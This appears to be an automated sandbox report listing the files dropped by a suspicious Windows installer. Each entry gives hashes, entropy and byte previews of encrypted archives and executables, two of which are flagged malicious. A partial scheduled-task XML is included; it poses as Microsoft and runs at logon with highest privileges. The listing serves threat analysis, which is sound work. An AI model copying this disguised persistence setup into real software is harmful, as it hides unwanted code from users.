                                          Preview:7z..'....9.........2........<..w,..C^...\..{>.......}.U}....;..G..]eS..m....q. N...._.V}..?l..keH..v.......~.B1._.^...3.1.........M6..v.k.9....P.~.....-.....I.@+....'.Q....AJ./T......Ed.ly.........4..O..~>..\.4Q...A...{zB.. .&N4...Z...L......u8.I:).....).U...../.*.<G.y....6.h.*..B.e./.U...<...9.$.E.j>......./.......=@oK.~.7..i..t..i;.>"q...L^....X.......`...U.3.g.I.j.......=ym..l.O......jX..*I...B....3.{......H......eRsN...<....lS..R..(....ff.3Y.3..J|a..R...........q..jI..r...1.,.l.J.|u.Z.\(.D.x.......<..KYN....@o..o...@a...jM.{s......|.O.Kq-....W.no.I....Q0*..i^.........O.43.x.@55(.....XG3a..e_....c12..b.x.;....e...D.......9..[Q..v.4..lq..3sq>.....Sf.2x..........V......#m.h..">..0.T...&5..`.M..^.........TbXRI.#D.....s..4..H...a....".....o...,.:,G....]8....#W.J...e.....o|.....c........Nz..|v..G4..@...5h}.b\...47..[7..i.2.A....ST...0M/3xs}...d.D..*cz..K....m.3y.e..F...m.( .D,.8.._.........z...]....Tzd..lD..-A..I..)..(....".O...
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):56546
                                          Entropy (8bit):7.996966859255975
                                          Encrypted:true
                                          SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                          MD5:CEA69F993E1CE0FB945A98BF37A66546
                                          SHA1:7114365265F041DA904574D1F5876544506F89BA
                                          SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                          SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                          Malicious:false
                                          Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:7-zip archive data, version 0.4
                                          Category:dropped
                                          Size (bytes):56546
                                          Entropy (8bit):7.996966859255979
                                          Encrypted:true
                                          SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                          MD5:4CB8B7E557C80FC7B014133AB834A042
                                          SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                          SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                          SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                          Malicious:false
                                          Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):31890
                                          Entropy (8bit):7.99402458740637
                                          Encrypted:true
                                          SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                          MD5:8622FC7228777F64A47BD6C61478ADD9
                                          SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                          SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                          SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                          Malicious:false
                                          Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:7-zip archive data, version 0.4
                                          Category:dropped
                                          Size (bytes):31890
                                          Entropy (8bit):7.99402458740637
                                          Encrypted:true
                                          SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                          MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                          SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                          SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                          SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                          Malicious:false
                                          Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):74960
                                          Entropy (8bit):7.99759370165655
                                          Encrypted:true
                                          SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                          MD5:950338D50B95A25F494EE74E97B7B7A9
                                          SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                          SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                          SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                          Malicious:false
                                          Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:7-zip archive data, version 0.4
                                          Category:dropped
                                          Size (bytes):74960
                                          Entropy (8bit):7.997593701656546
                                          Encrypted:true
                                          SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                          MD5:059BA7C31F3E227356CA5F29E4AA2508
                                          SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                          SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                          SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                          Malicious:false
                                          Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):29730
                                          Entropy (8bit):7.994290657653607
                                          Encrypted:true
                                          SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                          MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                          SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                          SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                          SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                          Malicious:false
                                          Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:7-zip archive data, version 0.4
                                          Category:dropped
                                          Size (bytes):29730
                                          Entropy (8bit):7.994290657653608
                                          Encrypted:true
                                          SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                          MD5:A9C8A3E00692F79E1BA9693003F85D18
                                          SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                          SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                          SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                          Malicious:false
                                          Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:7-zip archive data, version 0.4
                                          Category:dropped
                                          Size (bytes):249984
                                          Entropy (8bit):7.999215745260695
                                          Encrypted:true
                                          SSDEEP:6144:vAAk5v7IVF5HKAnfHvD74J8OxH2shtRWfRloy:g7IDDnfHvDEJ3HDo3
                                          MD5:8B03F1D18D9CE4A4745FC523250F9F4F
                                          SHA1:3D6B746CAD2263712C36D0F1FFEAD37338605287
                                          SHA-256:8E8F65F8C8AAB82671C7D6AE134444158260903922635E9E24CAE3F484A6484A
                                          SHA-512:48906663A2AE73976FC9E1484CC950871D6EB3BB67D8748FE40199EEB8C2367D29B64EDE40887E8F899F40AA249333326027238B4EC380A99F431E5D93BF0410
                                          Malicious:false
                                          Preview:7z..'....... .......@........9.Br........~RFY..R.F.B..mXf.....W[....v&`D.L..hg...^6L..fE...>.....9........'.?Q......#..(^d..].Q,..ykr..... 4.r....c..f.k...:/5Y.+y_......8..u.A)[cI..qo5 *]G2E+...3.P.._.C"|.V..7R..6.M...V..E7.....cE..v5.~..>.p.M.D.a....P".bCg...R..#.....<.{.B. .z..I....f\.......`..`t...Z.....2...;.8&.^..r....h..U......x.w...>xc......E.*_=..,....,<.('"........a.iR.W E.T.a&GWI..L. q]d.b~h...4.6Zy.{.C....*...:#...C.d..>..Gy..&.u@..Rk.W...<..e.Rq..i........,s....'3..I.D.........$m..).i$0..i....kyszw.......rm........<K."..Zl^.......cC.Ztvv...W.\.2..R.i..Wl*..*h.Z=!.rjdL..!.0W.......&..N...F..*....D.4~@.G..~.g.."X.<k..,..s._..V}A.....&.C.H.4R.(...j...=...R..t...rMK..J....#....&\.+U..X..J.dJ.J..'..b`.....k. ......Rz.]..p.....b.+..-.\.L.eC'Hq.2...U.N<...C. ../\|$.+0K"...=..QR..K.xCm.~..-....[M...[Ia.O.#..Z..%.U...]...,Je@*?....W.,.\...E.f..".q..@jy......y-r.Ef5|..r.F..;D.v=..h..@.GJ.{.9B K....W...hh..Pt..~...,ct.....o........^.YMb.D.....
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):63640
                                          Entropy (8bit):6.482810107683822
                                          Encrypted:false
                                          SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                          MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                          SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                          SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                          SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 9%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):4096
                                          Entropy (8bit):3.3449406240731085
                                          Encrypted:false
                                          SSDEEP:48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
                                          MD5:1EA10B1FA76DC2F1967E53A3FC2D43C4
                                          SHA1:23EADA9D0994D5B9ADE7878493C44551C0B5CF44
                                          SHA-256:2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
                                          SHA-512:15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
                                          Malicious:false
                                          Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                          Category:dropped
                                          Size (bytes):5649408
                                          Entropy (8bit):6.392614480390128
                                          Encrypted:false
                                          SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                          MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                          SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                          SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                          SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):1.1940658735648508
                                          Encrypted:false
                                          SSDEEP:3:Nlllul/nq/llh:NllUyt
                                          MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                          SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                          SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                          SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                          Malicious:false
                                          Preview:@...e................................................@..........
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):6144
                                          Entropy (8bit):4.720366600008286
                                          Encrypted:false
                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
